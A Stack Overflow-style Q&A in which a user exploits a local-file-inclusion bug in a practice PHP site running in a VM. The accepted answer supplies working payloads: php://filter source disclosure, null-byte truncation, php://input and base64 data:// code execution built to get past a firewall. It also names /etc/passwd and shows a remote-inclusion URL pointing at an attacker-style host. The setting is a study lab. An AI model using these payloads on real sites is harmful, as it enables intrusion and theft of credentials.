# PHP security exploit - list content of remote PHP file?

Tags: php, security, exploit, ssi

I'm trying to exploit some web vulnerabilities in a sample website running inside a VM (it is not available on the web - only for educational purposes). I have a php file named `setupreset.php` which has the information about MySQL configs, setup and passwords used to setup the website. This is in the same directory as the rest of the php files (index, products, forum, etc...).

This is the code of index.php, for reference:

```
<?php
include ("includes/header.php");
// Grab inputs
$page = $_GET[page];
if ($page=="") {
    include("home.html"); 
} else { include ($page . '.php'); } 
include ("includes/footer.php");
?>
```

The main goal is to list the contents of the `setupreset` PHP file, or download it somehow. If I navigate to this file: `http://10.211.55.5/index.php?page=setupreset`, it gets executed, but the PHP code is naturally not shown, due to the fact that it is parsed by the PHP interpreter.

Now, the website uses PHP `include`s, so URLs look like this: `http://10.211.55.5/index.php?page=products`. This seems like it's vulnerable to remote file inclusion, where I could simply point to another PHP page, e.g. `http://10.211.55.5/index.php?page=http://badwebsite.com/myevilscript.php` but `allow_url_include` is `off` and cannot be changed, so this won't work (I tried this). However, `allow_url_fopen` is likely on (since it's on by default), so my question is the following: is it possible to upload a PHP file or some script that lists the content of `setupreset.php` using this kind of exploit?

Comment: It's not parsed by the browser. It's parsed by the PHP interpreter. The browser only displays it. Did you try a directory traversal? This might work…

Comment: My bad, @nietonfir, that's what I meant.

Comment: And not sure if it's a typo or not, but shouldn't it read `$_GET["page"]`?

Comment: It's not parsed by the browser. It's parsed by the PHP interpreter. T̶h̶e̶ ̶b̶r̶o̶w̶s̶e̶r̶ ̶o̶n̶l̶y̶ ̶d̶i̶s̶p̶l̶a̶y̶s̶ ̶i̶t̶

Answer (score 36, accepted):

If `allow_url_include` is off, you can't execute remote code. But you can find other pages, for example a content management dashboard, to upload your code as "image", then find the actual path and `include` it.

And, there are still ways to exploit.

Let's look inside your code. You may notice that it automatically add an extension `.php` at the end of path. So you should remove `php` in GET param. But what if the file you want to include does not have PHP extension? Then use `%00` to terminate string, such as

```
http://localhost/include.php?page=../uploads/your_uploaded_fake_image.jpg%00
```

There's a special protocol in PHP, powerful and dangerous. It's `php://`.
You can check out the [offcial manual](http://php.net/manual/en/wrappers.php.php) for detailed information, and here I'll show you some cases to make a file inclusion vulnerability become source disclosure and even remote code execution vulnerabilities.

Before your test, I suggest you use **Firefox** with **[HackBar](https://addons.mozilla.org/en-US/firefox/addon/hackbar/)** plugin. It's a powerful penetration testing suite.

1. Source disclosure

This feature doesn't need url inclusion allowed.

`php://filter` is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read. ([Reference](http://www.php.net/manual/en/filters.string.php))

Then you can see the source `secret.inc.php` in the same directory via following request.

```
http://localhost/include.php?page=php://filter/read=convert.base64-encode/resource=secret.inc
```

[image: demo]

File content will be encoded in base64, so it does support binary file.

It's **powerful** to get sensitive information, such as database passwords or a encryption key! If privilege is not proper configurated, it can even jump out of cage and extract data from files in outter directories, like `/etc/passwd`!

2. Remote code execution

**Actually you can't exploit this way, because `allow_url_include` is Off in this case.**

But I must point it out because it's **magical**!

It's completly different from local include. It doesn't need to upload any file to a remote server or so. All you need is one single request.

`php://input` can access the raw HTTP request body, so what does `include("php://input")` do? Just visit `http://localhost/include.php?page=php://input`, with valid PHP code in request body, then you can execute any (allowed) function in remote server!

[image]

Don't forget the `%00` to drop `.php` tail.

Besides, PHP supports `data://` URL scheme. You can directly put code in GET param! The following test doesn't need any special tool, just a normal browser can execute an attack.

```
http://localhost/include.php?page=data:text/plaintext,<?php phpinfo();?>
```

Some Web Application Firewalls may detect suspected string in URL and block evil request, they won't leave the `phpinfo` alone. Is there a way to encrypt? Of course. `data://` URL supports at least base64 encoding...

```
http://localhost/include.php?page=data:text/plain;base64, PD9waHAgcGhwaW5mbygpOyA/Pg==
```

And you will get familiar phpinfo once again!

[image: with base64 encoding]

### Note

The null byte trick (`%00`) does not work anymore for PHP >= 5.3.4: http://blog.benjaminwalters.net/?p=22139

Comment: Great tool, I'll be sure to check that out! The request `php://filter/read=convert.base64-encode/resource` did the trick, as the website gave me the base 64 encoded version of the file by doing `http://10.211.55.5/index.php?page=php://filter/read=convert.base64-encode/resource=setupreset`. Then I simply used an online decoder (such as http://www.base64decode.org/) to get the raw content. Many thanks!

Comment: No problem. By the way, you can directly decode base64 in modern browser, just navigate to `data:text/plaintext;base64,aGVsbG8gd29ybGQ=` and see what's gonna happen. ;)

Comment: What add-on is that? :)

Comment: @BrendanScarvell It's a powerful penetration helper, which allows you execute complex HTTP requests. Check out the link for detail. :)

Comment: Note that the blog cannot be accessed anymore. It's still accessible with the WayBackMachine http://web.archive.org/web/20140625025938/http://blog.benjaminwalters.net/?p=22139

Comment: what happens when you have the null byte file include vulnerability in a cookie. the code itself builds a var with include function and the cookie[user] value followed by a .php extension.

Answer (score 2):

Use a directory traversal and end your input string with a [`%00` NUL meta character](http://en.wikipedia.org/wiki/Null_character) (as mentioned on [wikipedia](http://en.wikipedia.org/wiki/File_inclusion_vulnerability)).

```
http://example.com/index.php?page=setuppreset%00
```

This will remove the ".php" suffix from the inclusion and might help you somehow.

Answer (score 0):

It is not. The php file is getting executed because you call `include`, if you called `readfile`, `file_get_contents` or similar you could see the contents of the php file.

Comment: Yes, that would be easy, but unfortunately I can't change the source code of the file unless it's by some form of exploit.

Comment: @evert could you explain...making file_get_content(), i just get the html